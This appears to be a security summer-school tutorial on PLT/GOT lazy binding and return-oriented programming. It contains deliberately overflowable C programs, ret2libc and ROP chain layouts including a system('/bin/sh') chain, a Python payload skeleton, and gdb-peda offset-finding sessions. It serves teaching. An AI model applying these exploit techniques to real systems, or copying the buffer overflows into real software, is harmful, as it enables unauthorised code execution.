====== 0x08. Return Oriented Programming ======

===== Resources =====

[[https://security.cs.pub.ro/summer-school/res/slides/11-return-oriented-programming.pdf|Session 08 slides]]

[[https://github.com/hexcellents/sss-exploit|Session's tutorials and challenges repo]]

[[https://security.cs.pub.ro/summer-school/res/arc/11-return-oriented-programming-full.zip|Session's solutions]]


=== PLT and GOT ===

ASLR is not the only feature that prevents the compiler and the linker from resolving some relocations before the binary is actually running. Shared libraries can also be combined in different ways, so the first time the address of a shared library is actually known is while the loader is running. ASLR is orthogonal to this: the loader could choose to assign addresses to libraries in a round-robin fashion, or could use ASLR to assign them randomly.

Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the libraries, but this breaks the memory access protection of the ''.text'' section, which should only be **readable** and **executable**.

To solve this problem we need another level of indirection: all memory accesses to symbols located in shared libraries read the actual address at runtime from a table called the **Global Offset Table (''.got'')**. The loader populates this table. This works for both data accesses and function calls, but function calls actually go through a small stub (i.e., a few instructions) stored in the **Procedure Linkage Table (''.plt'')**.

The PLT is responsible for finding the address of a shared library function the first time it is called (**lazy binding**) and writing it to a GOT entry (the function pointers are stored in ''.got.plt''). Subsequent calls use the already resolved address.

Let's take a quick look at the code generated for a shared library call. You can use any binary you like, we'll just show an example from one that simply calls ''puts()''.

<code bash>
~$ objdump -D -j .text -M intel hello | grep puts      
</code>
<code text>
 80483e4:	e8 07 ff ff ff       	call   80482f0 <puts@plt>
</code>
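The five bytes ''e8 07 ff ff ff'' encode a relative call: the displacement is a signed little-endian dword counted from the end of the instruction. As a quick sanity check, here is a minimal sketch that recomputes the target; the helper name ''rel32_target'' is made up for this example.

```python
import struct

def rel32_target(insn_addr, insn_bytes):
    """Return the destination of a 5-byte `call rel32` (e8) or `jmp rel32` (e9)."""
    assert len(insn_bytes) == 5 and insn_bytes[0] in (0xE8, 0xE9)
    (rel,) = struct.unpack("<i", insn_bytes[1:])   # signed little-endian displacement
    return (insn_addr + 5 + rel) & 0xFFFFFFFF      # relative to the next instruction

# The call from the objdump line above
target = rel32_target(0x80483E4, bytes.fromhex("e807ffffff"))
print(hex(target))
```

The same arithmetic applies to the ''e9'' relative jumps that appear inside the PLT stubs.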

The ''.plt'' section starts at address ''0x080482e0'', so the call target ''0x80482f0'' lies ''0x10'' bytes into it:

<code bash>
~$ readelf --sections hello
</code>

<code text>
...
  [12] .plt              PROGBITS        080482e0 0002e0 000040 04  AX  0   0 16
...
</code>

Let's see what the code there looks like:

<code bash>
~$ objdump -D -j .plt -M intel hello | grep -A 3 '<puts@plt>'
</code>

<code text>
080482f0 <puts@plt>:
 80482f0:	ff 25 00 a0 04 08    	jmp    DWORD PTR ds:0x804a000
 80482f6:	68 00 00 00 00       	push   0x0
 80482fb:	e9 e0 ff ff ff       	jmp    80482e0 <_init+0x30>
</code>

We see it jumping to a pointer stored at ''0x804a000'' in the data section. Let's check the binary relocations for that location:

<code bash>
~$ readelf --relocs hello
</code>

<code text>
...
Relocation section '.rel.plt' at offset 0x298 contains 3 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a000  00000107 R_386_JUMP_SLOT   00000000   puts
...
</code>

Ok, good, but what is actually stored at this address initially?

<code bash>
~$ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello
</code>

<code text>
hello:     file format elf32-i386

Contents of section .got.plt:
 804a000 f6820408 06830408 16830408           ............
</code>
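The dump shows raw bytes, so each GOT slot has to be read as a little-endian dword. A small sketch that decodes the three slots from the output above (only the bytes and the start address come from the dump, the rest is illustration):

```python
import struct

# Bytes of .got.plt starting at 0x804a000, copied from the objdump -s output
raw = bytes.fromhex("f6820408" "06830408" "16830408")

# Three little-endian 32-bit pointers, one per GOT slot
slots = struct.unpack("<3I", raw)
for i, value in enumerate(slots):
    print(hex(0x804A000 + 4 * i), "->", hex(value))
```

The decoded values are ''0x10'' bytes apart, which is consistent with one 16-byte PLT stub per imported function.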

We recognize ''f6820408'' (''0x80482f6'' in little-endian byte order) as the address of the next instruction in the ''puts@plt'' stub that we disassembled above. That instruction pushes 0 onto the stack, and the one after it jumps to ''0x80482e0'', the start of the ''.plt'' section. This is the entry to the one-time resolver, and it looks like this:

<code bash>
~$ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0'
</code>

<code text>
080482e0 <puts@plt-0x10>:
 80482e0:	ff 35 f8 9f 04 08    	push   DWORD PTR ds:0x8049ff8
 80482e6:	ff 25 fc 9f 04 08    	jmp    DWORD PTR ds:0x8049ffc
 80482ec:	00 00                	add    BYTE PTR [eax],al
</code>

<note>
Going further into the resolver is left as an exercise. You can use GDB to inspect the address in ''0x8049ffc'', and what happens when this jumps there.
</note>

What's going on here? What's actually happening is //lazy binding//: by convention, when the dynamic linker loads a library, it puts an identifier and the address of a resolution function into known places in the GOT. What happens is roughly this: on the first call of a function, the GOT entry still points back into the PLT stub, so the indirect jump simply lands on the next instruction. The stub pushes a value identifying the function, the common code at the start of ''.plt'' pushes the identifier, and the dynamic linker is called, which at that point has enough information to figure out "hey, this program is trying to find the function foo". It finds the function and patches its address into the GOT, so that the next time the original PLT entry is called it jumps to the actual function rather than to the lookup stub. Ingenious!
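To make the mechanism concrete, here is a toy model of lazy binding in Python. It is only an analogy: the dictionary stands in for the GOT, ''puts_plt'' for the PLT stub and ''resolver'' for the dynamic linker, and all of these names are invented for the sketch.

```python
# Toy model of lazy binding; names and structure are illustrative only.
calls_to_resolver = []

def real_puts(s):
    return "puts: " + s

LIBRARY = {"puts": real_puts}          # stands in for the loaded shared library

def resolver(name):
    """Plays the dynamic linker: look the symbol up and patch the GOT."""
    calls_to_resolver.append(name)
    GOT[name] = LIBRARY[name]          # later calls bypass the resolver
    return GOT[name]

def make_lazy_slot(name):
    """Initial GOT content: an entry that falls back to the resolver."""
    def lazy(*args):
        return resolver(name)(*args)
    return lazy

GOT = {"puts": make_lazy_slot("puts")}

def puts_plt(s):
    """The PLT stub: always an indirect jump through the GOT slot."""
    return GOT["puts"](s)

print(puts_plt("first"))    # goes through the resolver
print(puts_plt("second"))   # goes straight to real_puts
print(calls_to_resolver)
```

The caller never changes: it always goes through ''puts_plt''. Only the table entry is rewritten, which is why the ''.text'' section can stay read-only.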


==== Return Oriented Programming ====

{{ :session:rop.png?nolink&600 |}}

=== Motivation ===
In the previous sessions we discussed ''ret2libc'' attacks. The standard attack was to overwrite the stack, starting at the saved return address (''RET''), in the following way:
<code>
RET + 0x00:   addr of system
RET + 0x04:   JUNK
RET + 0x08:   address of desired command (e.g. '/bin/sh')
</code>

However, what happens when you need to call multiple functions? Say you need to call f1() and then f2(0xAB, 0xCD)? The payload should be:
<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of f2 (return address after f1 finishes)
RET + 0x08:   JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called)
RET + 0x0c:   0xAB (param1 of f2)
RET + 0x10:   0xCD (param2 of f2)
</code>
What about if we need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42) ?
<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of f2 (return address after f1 finishes)
RET + 0x08:   0xAB (param1 of f1)  
RET + 0x0c:   0xCD (param2 of f1)  but this should also be 0xEF (param1 of f2)
RET + 0x10:   0x42 (param2 of f2) 
</code>

This kind of conflict can be resolved using Return Oriented Programming, a generalization of ''ret2libc'' attacks.

=== NOP analogy ===
While ''ret2libc'' uses functions directly, Return Oriented Programming uses a finer level of code execution: instruction groups.
Let's explore an example:
<code c>
#include <unistd.h>

int main(void)
{
	char a[16];
	/* deliberately reads up to 100 bytes into a 16-byte buffer */
	read(0, a, 100);

	return 0;
}
</code>
This code obviously suffers from a stack buffer overflow. The offset to the return address is 28, so the dwords from offset 28 onwards will be popped off the stack and used as return addresses.
Remember the NOP sled concept from previous sessions? These were long chains of NOP instructions ("\x90") used to pad a payload so that an imprecise jump still reaches the shellcode.
Since we can't add any new code to the program (NX is enabled), how could we simulate the effect of a NOP sled? Easy! Using return instructions!
<code>
# objdump  -d a -M intel | grep $'\t'ret
 80482dd:	c3                   	ret    
 804837a:	c3                   	ret    
 80483b7:	c3                   	ret    
 8048437:	c3                   	ret    
 8048444:	c3                   	ret    
 80484a9:	c3                   	ret    
 80484ad:	c3                   	ret    
 80484c6:	c3                   	ret    
</code>
Any and all of these addresses will be ok. The payload could be the following:
<code>
RET + 0x00:   0x80482dd
RET + 0x04:   0x80482dd
RET + 0x08:   0x80482dd
RET + 0x0c:   0x80482dd
RET + 0x10:   0x80482dd
.....
</code>
The original ''ret'' (in the normal code flow) will pop RET+0x00 off the stack and jump to it. Popping the value automatically increases ''esp'' by 4, so it now points to the next value. The instruction at ''0x80482dd'' is another ''ret'', which does the same thing again. This goes on until an address is popped off the stack that does not point to a ''ret''.

That payload is not the only option. We don't really care which ''ret'' we pick. The payload could very well look like this:
<code>
RET + 0x00:   0x80482dd
RET + 0x04:   0x804837a
RET + 0x08:   0x80483b7
RET + 0x0c:   0x8048437
RET + 0x10:   0x80484c6
.....
</code>
Notice the addresses are different but because they all point to a ''ret'' instruction they will all have the same net effect on the code flow.
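If it helps, the behaviour can be simulated before trying it on the real binary. The sketch below follows a list of dwords the way a chain of ''ret'' instructions would; the ''ret'' addresses are the ones from the listing above, while ''0xDEADBEEF'' is just a placeholder for whatever comes after the sled.

```python
# Addresses of `ret` instructions taken from the objdump listing above
RET_ADDRS = {0x80482DD, 0x804837A, 0x80483B7, 0x8048437, 0x80484C6}

def run_ret_sled(stack):
    """Follow a list of dwords the way a chain of `ret` instructions would."""
    index = 0
    eip = stack[index]          # the original ret pops RET + 0x00
    index += 1
    while eip in RET_ADDRS:     # landed on another ret: pop the next dword
        eip = stack[index]
        index += 1
    return eip, index * 4       # final target and number of bytes consumed

FINAL = 0xDEADBEEF              # placeholder for the first non-ret address
same = [0x80482DD] * 5 + [FINAL]
mixed = [0x80482DD, 0x804837A, 0x80483B7, 0x8048437, 0x80484C6, FINAL]
print(run_ret_sled(same) == run_ret_sled(mixed))
```

Both payloads end up at the same address after consuming the same number of bytes, which is exactly the NOP-like behaviour described above.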

<note warning>
Take a moment to fully understand what is happening here. Run your own program and step through the payload to see this in action before proceeding.
Follow along using this skeleton to generate the payloads.
</note>
<file python skel.py>
#!/usr/bin/env python3
import struct, sys

def dw(i):
	# Pack i as a little-endian 32-bit dword
	return struct.pack("<I", i)

#TODO update count for your prog
pad_count_to_ret = 100
payload = b"X" * pad_count_to_ret

#TODO figure out the rop chain
payload += dw(0xcafebeef)
payload += dw(0xdeadc0de)

# Write raw bytes; in Python 3 sys.stdout.write() only accepts str
sys.stdout.buffer.write(payload)

</file>


=== Gadgets & ROP chains ===
Now that we have a sort of neutral primitive equivalent to a NOP, let's actually do something useful.
The building blocks of ROP payloads are called gadgets. These are short sequences of instructions that end with a ''ret'' instruction.
Here are some gadgets from the previous program:
<code>
0x8048443: pop ebp; ret
0x80484a7: pop edi; pop ebp; ret
0x8048441: mov ebp,esp; pop ebp; ret
0x80482da: pop eax; pop ebx; leave; ret
0x80484c3: pop ecx; pop ebx; leave; ret
</code>

By carefully stitching such gadgets on the stack we can bring code execution to almost any context we want.
As an example let's say we would like to load 0x41424344 into eax and 0x61626364 into ebx. The payload should look like:
<code>
RET + 0x00:   0x80482da  (pop eax; pop ebx; leave; ret)
RET + 0x04:   0x41424344
RET + 0x08:   0x61626364
RET + 0x0c:   0xAABBCCDD ???
</code>
  * First the return address is popped from the stack and execution goes there.
  * At ''pop eax'' 0x41424344 is loaded into eax and esp is increased by 4.
  * At ''pop ebx'' 0x61626364 is loaded into ebx and esp is increased by 4 again.
  * At ''leave'' two things actually happen: "mov esp, ebp; pop ebp". The current stack frame is discarded: esp is set to ebp, and ebp is then loaded with the saved base pointer found there. So esp will now be the old ebp+4.
  * At ''ret'' code flow will go to the address stored at the old ebp+4. This implies that execution will __not__ go to 0xAABBCCDD but to some other address that may or may not be in our control (depending on how much we can overflow on the stack). If it is in our control we can overwrite that address with the rest of the ROP chain.
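The steps above can be replayed with a tiny emulation of the gadget. This is a rough sketch on a dictionary-based memory model; the stack addresses ''0x1000'' and ''0x2000'' and the values stored at ''0x2000'' and ''0x2004'' are arbitrary placeholders.

```python
def run_gadget(mem, esp, ebp):
    """Emulate `pop eax; pop ebx; leave; ret` on a dict-based memory model."""
    eax = mem[esp]          # pop eax
    esp += 4
    ebx = mem[esp]          # pop ebx
    esp += 4
    esp = ebp               # leave, part 1: mov esp, ebp
    ebp = mem[esp]          # leave, part 2: pop ebp
    esp += 4
    eip = mem[esp]          # ret: jump to the dword at old ebp + 4
    return eax, ebx, eip

# Hypothetical layout: the chain continues at 0x1000, ebp holds 0x2000
mem = {
    0x1000: 0x41424344,     # RET + 0x04 -> eax
    0x1004: 0x61626364,     # RET + 0x08 -> ebx
    0x1008: 0xAABBCCDD,     # RET + 0x0c, never used
    0x2000: 0x11111111,     # popped into ebp by leave
    0x2004: 0x22222222,     # where ret really goes
}
eax, ebx, eip = run_gadget(mem, esp=0x1000, ebp=0x2000)
print(hex(eax), hex(ebx), hex(eip))
```

Note that in a classic overflow the ebp value in use at this point was itself popped from the overwritten stack by the vulnerable function's own ''leave'', so it is often attacker-controlled as well.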

We have now seen how gadgets can be useful if we want the CPU to achieve a certain state. This is particularly useful on other architectures such as ARM and x86_64 where functions do not take parameters from the stack but from registers.
As an example, if we want to call f1(0xAB, 0xCD, 0xEF) on x86_64 we first need to know the calling convention for the first three parameters:
  * 1st param: RDI
  * 2nd param: RSI
  * 3rd param: RDX
Next we would need gadgets for each. Let's assume these 2 scenarios:
Scenario 1:
<code>
0x400124:  pop rdi; pop rsi; ret
0x400235:  pop rdx; ret
0x400440:  f1()

Payload:
RET + 0x00:   0x400124
RET + 0x08:   val of RDI (0xAB)
RET + 0x10:   val of RSI (0xCD)
RET + 0x18:   0x400235
RET + 0x20:   val of RDX (0xEF)
RET + 0x28:   f1
</code>

Scenario 2:
<code>
0x400125:  pop rdi; ret
0x400252:  pop rsi; ret
0x400235:  pop rdx; ret
0x400440:  f1()

Payload:
RET + 0x00:   0x400125
RET + 0x08:   val of RDI (0xAB)
RET + 0x10:   0x400252
RET + 0x18:   val of RSI (0xCD)
RET + 0x20:   0x400235 
RET + 0x28:   val of RDX (0xEF)
RET + 0x30:   f1
</code>
Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide).
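As an illustration, Scenario 2 could be packed like this. The gadget and function addresses are the example values from the listing above, not addresses from a real binary, and ''qw'' is a helper defined just for this sketch.

```python
import struct

def qw(value):
    """Pack a 64-bit little-endian qword."""
    return struct.pack("<Q", value)

POP_RDI = 0x400125   # pop rdi; ret
POP_RSI = 0x400252   # pop rsi; ret
POP_RDX = 0x400235   # pop rdx; ret
F1      = 0x400440   # f1()

chain = b"".join(qw(v) for v in (
    POP_RDI, 0xAB,   # 1st param
    POP_RSI, 0xCD,   # 2nd param
    POP_RDX, 0xEF,   # 3rd param
    F1,
))
print(len(chain))
```

Every entry, whether a gadget address or a small constant like ''0xAB'', occupies a full 8 bytes on the stack.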


The second use of gadgets is to clear the stack. Remember the issue we had in the **Motivation** section? Let's solve it using gadgets.
We need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42). Our initial solution was:
<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of f2 (return address after f1 finishes)
RET + 0x08:   0xAB (param1 of f1)  
RET + 0x0c:   0xCD (param2 of f1)  but this should also be 0xEF (param1 of f2)
RET + 0x10:   0x42 (param2 of f2) 
</code>

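The problem is that the parameters of f1 are getting in the way of calling f2. We need to find a **pop pop ret** gadget and use it as the return address of f1: when f1 returns, the two pops discard its parameters and the final ''ret'' lands on the address of f2. The actual registers are not important.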

<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of (pop eax, pop ebx, ret) 
RET + 0x08:   0xAB (param1 of f1)  
RET + 0x0c:   0xCD (param2 of f1)
RET + 0x10:   addr of f2
RET + 0x14:   JUNK
RET + 0x18:   0xEF (param1 of f2)
RET + 0x1c:   0x42 (param2 of f2) 
</code>
Now we can even call the next function f3 if we repeat the trick:
<code>
RET + 0x00:   addr of f1
RET + 0x04:   addr of (pop eax, pop ebx, ret) 
RET + 0x08:   0xAB (param1 of f1)  
RET + 0x0c:   0xCD (param2 of f1)
RET + 0x10:   addr of f2
RET + 0x14:   addr of (pop eax, pop ebx, ret) 
RET + 0x18:   0xEF (param1 of f2)
RET + 0x1c:   0x42 (param2 of f2) 
RET + 0x20:   addr of f3
</code>
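The same layout can be generated programmatically. Below is a minimal sketch: ''chained_calls'' is a helper invented for this example, the function addresses are placeholders, and the cleanup gadget is the ''pop edi; pop ebp; ret'' listed earlier.

```python
import struct

def dw(value):
    """Pack a 32-bit little-endian dword."""
    return struct.pack("<I", value)

def chained_calls(calls, cleanup):
    """calls: list of (func_addr, [args]); cleanup: {number_of_args: gadget_addr}."""
    chain = b""
    for func, args in calls:
        chain += dw(func)
        chain += dw(cleanup[len(args)])          # return address: pops this call's args
        chain += b"".join(dw(a) for a in args)
    return chain

PPR = 0x80484A7                                  # pop edi; pop ebp; ret
F1, F2, F3 = 0x8048500, 0x8048520, 0x8048540     # placeholder function addresses

chain = chained_calls([(F1, [0xAB, 0xCD]), (F2, [0xEF, 0x42])], {2: PPR})
chain += dw(F3)                                  # RET + 0x20: addr of f3
print(len(chain))
```

A function with a different number of parameters needs a cleanup gadget with the matching number of pops, which is why the helper takes a table keyed by argument count.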


==== Some useful ninja tricks ====

=== Memory spraying ===
Let's take the following program:
<code c>
#include <unistd.h>

int main(void)
{
        int x, y, z;
        char a, b, c;
        char buf[23];
        /* deliberately reads up to 100 bytes into a 23-byte buffer */
        read(0, buf, 100);

        return 0;
}
</code>

A fairly simple overflow, right? How fast can you figure out the offset to the return address? How much padding do you need?
There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly.

A [[ https://en.wikipedia.org/wiki/De_Bruijn_sequence | De Bruijn sequence ]] is a string of symbols from a given alphabet in which every substring of K consecutive symbols appears only once in the whole string. If we construct such a string out of printable characters and feed it to the program, we only need to know the address at which the Segmentation Fault occurred. Converting that address back to 4 bytes and searching for them in the initial string gives us the exact offset to the return address.
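For the curious, such a sequence can be generated in a few lines. The sketch below uses the standard recursive construction for de Bruijn sequences; note that the resulting string is **not** the same as the pattern produced by peda, so offsets must be looked up in whichever pattern was actually sent.

```python
def de_bruijn(alphabet, n):
    """Return a de Bruijn sequence of order n over `alphabet` (standard construction)."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)

# First 200 characters of an order-4 sequence over the uppercase letters
pattern = de_bruijn("ABCDEFGHIJKLMNOPQRSTUVWXYZ", 4)[:200]
windows = [pattern[i:i + 4] for i in range(len(pattern) - 3)]
print(len(set(windows)) == len(windows))   # every 4-character window is unique
print(pattern.find(pattern[76:80]))        # so a window maps back to its offset
```

Because each 4-character window is unique, the 4 bytes that end up in a register identify exactly one position in the input.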

Peda can help you do this. Here's how:
<code bash>
gdb-peda$ help pattern_create 
Generate a cyclic pattern
Usage:
    pattern_create size [file]

gdb-peda$ pattern_create 100
'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl'

gdb-peda$ help pattern_offset 
Search for offset of a value in cyclic pattern
Usage:
    pattern_offset value

gdb-peda$ pattern_offset AA8A
AA8A found at offset: 76
</code>

Things can get even more convenient: if you feed such a pattern to the program as input, peda can search for traces of it in registers and memory. Here's how to figure out the offset to the return address of the previous program in 3 commands, as promised:
<code bash>
# gdb -q ./a
Reading symbols from ./a...(no debugging symbols found)...done.
gdb-peda$ pattern_create 200
'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A'
gdb-peda$ run
AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0xf7f97e54 --> 0x1a6d5c 
ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
EDX: 0x64 ('d')
ESI: 0x0 
EDI: 0x0 
EBP: 0x41334141 ('AA3A')
ESP: 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
EIP: 0x41414541 ('AEAA')
EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414541
[------------------------------------stack-------------------------------------]
0000| 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0004| 0xffffcd74 ("AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0008| 0xffffcd78 ("AfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0012| 0xffffcd7c ("5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0016| 0xffffcd80 ("AAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0020| 0xffffcd84 ("A6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0024| 0xffffcd88 ("HAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0028| 0xffffcd8c ("AA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0032| 0xffffcd90 ("AIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0036| 0xffffcd94 ("iAA8AAJAAjAA9AAKAAkAALAAl")
0040| 0xffffcd98 ("AAJAAjAA9AAKAAkAALAAl")
0044| 0xffffcd9c ("AjAA9AAKAAkAALAAl")
0048| 0xffffcda0 ("9AAKAAkAALAAl")
0052| 0xffffcda4 ("AAkAALAAl")
0056| 0xffffcda8 ("ALAAl")
0060| 0xffffcdac --> 0x6c ('l')

[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414541 in ?? ()


gdb-peda$ pattern_search 
Registers contain pattern buffer:
EIP+0 found at offset: 35
EBP+0 found at offset: 31
Registers point to pattern buffer:
[ECX] --> offset 0 - size ~100
[ESP] --> offset 39 - size ~61
Pattern buffer found at:
0xffffcd49 : offset    0 - size  100 ($sp + -0x27 [-10 dwords])
0xffffd1c6 : offset 23424 - size    4 ($sp + 0x456 [277 dwords])
0xffffd1d8 : offset 22930 - size    4 ($sp + 0x468 [282 dwords])
0xffffd276 : offset 48535 - size    4 ($sp + 0x506 [321 dwords])
References to pattern buffer found at:
0xffffcd20 : 0xffffcd49 ($sp + -0x50 [-20 dwords])
0xffffcd34 : 0xffffcd49 ($sp + -0x3c [-15 dwords])

</code>
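What ''pattern_search'' reports for the registers can be reproduced by hand: pack the register value as a little-endian dword and look for those 4 bytes in the pattern. A minimal sketch, using only a prefix of the pattern from the session above (''offset_of'' is a helper named for this example):

```python
import struct

# Prefix of the 200-byte pattern fed to the program above
pattern = b"AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAH"

def offset_of(reg_value):
    """Offset in the pattern of the 4 bytes that ended up in a 32-bit register."""
    return pattern.find(struct.pack("<I", reg_value))

print(offset_of(0x41414541))   # EIP ('AEAA') -> 35
print(offset_of(0x41334141))   # EBP ('AA3A') -> 31
```

The saved base pointer sits 4 bytes below the return address, which is why the two offsets differ by exactly 4.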


=== Vulnerable function identification ===
As you can see from above, the base pointer gets trashed, so backtracing is not possible:
<code bash>
gdb-peda$ bt
#0  0x41414541 in ?? ()
#1  0x34414165 in ?? ()
#2  0x41464141 in ?? ()
#3  0x41416641 in ?? ()
</code>
If this program were larger, you wouldn't know which "ret" was the last one executed before jumping into the payload.
You can set a breakpoint on all declared functions (if the program has not been stripped) using **rbreak** and then attach a ''continue'' command to them, so that each hit is printed without stopping:
<code bash>
gdb-peda$ rbreak 
Breakpoint 1 at 0x80482d4
<function, no debug info> _init;
Breakpoint 2 at 0x8048310
<function, no debug info> read@plt;
Breakpoint 3 at 0x8048320
<function, no debug info> __gmon_start__@plt;
Breakpoint 4 at 0x8048330
<function, no debug info> __libc_start_main@plt;
Breakpoint 5 at 0x8048340
<function, no debug info> _start;
Breakpoint 6 at 0x8048370
<function, no debug info> __x86.get_pc_thunk.bx;
Breakpoint 7 at 0x804843f
<function, no debug info> main;
Breakpoint 8 at 0x8048470
<function, no debug info> __libc_csu_init;
Breakpoint 9 at 0x80484e0
<function, no debug info> __libc_csu_fini;
Breakpoint 10 at 0x80484e4
<function, no debug info> _fini;


gdb-peda$ commands
Type commands for breakpoint(s) 1-10, one per line.
End with a line saying just "end".
>continue
>end


gdb-peda$ run
Starting program: /ctf/Hexcellents/summerschool2014/lab_material/session-12/tut1/a 
warning: the debug information found in "/usr/lib64/debug/lib64/ld-2.17.so.debug" does not match "/lib/ld-linux.so.2" (CRC mismatch).

warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?

Breakpoint 4, 0x08048330 in __libc_start_main@plt ()

Breakpoint 8, 0x08048470 in __libc_csu_init ()

Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx ()

Breakpoint 1, 0x080482d4 in _init ()

Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx ()

Breakpoint 7, 0x0804843f in main ()

Breakpoint 2, 0x08048310 in read@plt ()

AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7

Program received signal SIGSEGV, Segmentation fault.
0x41414541 in ?? ()
</code>


=== ROP payload debugging ===
When you know what the offending function is, disassemble it and break on "ret":
<code bash>
gdb-peda$ pdis main
Dump of assembler code for function main:
   0x0804843c <+0>:	push   ebp
   0x0804843d <+1>:	mov    ebp,esp
   0x0804843f <+3>:	and    esp,0xfffffff0
   0x08048442 <+6>:	sub    esp,0x30
   0x08048445 <+9>:	mov    DWORD PTR [esp+0x8],0x64
   0x0804844d <+17>:	lea    eax,[esp+0x19]
   0x08048451 <+21>:	mov    DWORD PTR [esp+0x4],eax
   0x08048455 <+25>:	mov    DWORD PTR [esp],0x0
   0x0804845c <+32>:	call   0x8048310 <read@plt>
   0x08048461 <+37>:	mov    eax,0x0
   0x08048466 <+42>:	leave  
   0x08048467 <+43>:	ret    
End of assembler dump.
gdb-peda$ b *0x08048467
Breakpoint 1 at 0x8048467


AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0xf7f97e54 --> 0x1a6d5c 
ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA\n\300\317\377\367\034")
EDX: 0x64 ('d')
ESI: 0x0 
EDI: 0x0 
EBP: 0x41334141 ('AA3A')
ESP: 0xffffcd6c ("AEAAeAA4AAFAAfA\n\300\317\377\367\034")
EIP: 0x8048467 (<main+43>:	ret)
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048445 <main+9>:	mov    DWORD PTR [esp+0x8],0x64
   0x804844d <main+17>:	lea    eax,[esp+0x19]
   0x8048451 <main+21>:	mov    DWORD PTR [esp+0x4],eax
   0x8048455 <main+25>:	mov    DWORD PTR [esp],0x0
   0x804845c <main+32>:	call   0x8048310 <read@plt>
   0x8048461 <main+37>:	mov    eax,0x0
   0x8048466 <main+42>:	leave  
=> 0x8048467 <main+43>:	ret    
   0x8048468:	xchg   ax,ax
   0x804846a:	xchg   ax,ax
   0x804846c:	xchg   ax,ax
   0x804846e:	xchg   ax,ax
   0x8048470 <__libc_csu_init>:	push   ebp
   0x8048471 <__libc_csu_init+1>:	push   edi
   0x8048472 <__libc_csu_init+2>:	xor    edi,edi
   0x8048474 <__libc_csu_init+4>:	push   esi
[------------------------------------stack-------------------------------------]
0000| 0xffffcd6c --> 0xf7e333e0 (<system>:	sub    esp,0x1c)
0004| 0xffffcd70 --> 0x80484cf (<__libc_csu_init+95>:	pop    ebp)
0008| 0xffffcd74 --> 0xf7f56be6 ("/bin/sh")
0012| 0xffffcd78 --> 0xf7e25c00 (<exit>:	push   ebx)


gdb-peda$ patto AEAAeAA4AAFAAfA
AEAAeAA4AAFAAfA found at offset: 35
</code>

Then you can break on all called functions or step as needed to see if the payload is doing what you want it to.


=== checksec in peda ===
<code bash>
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
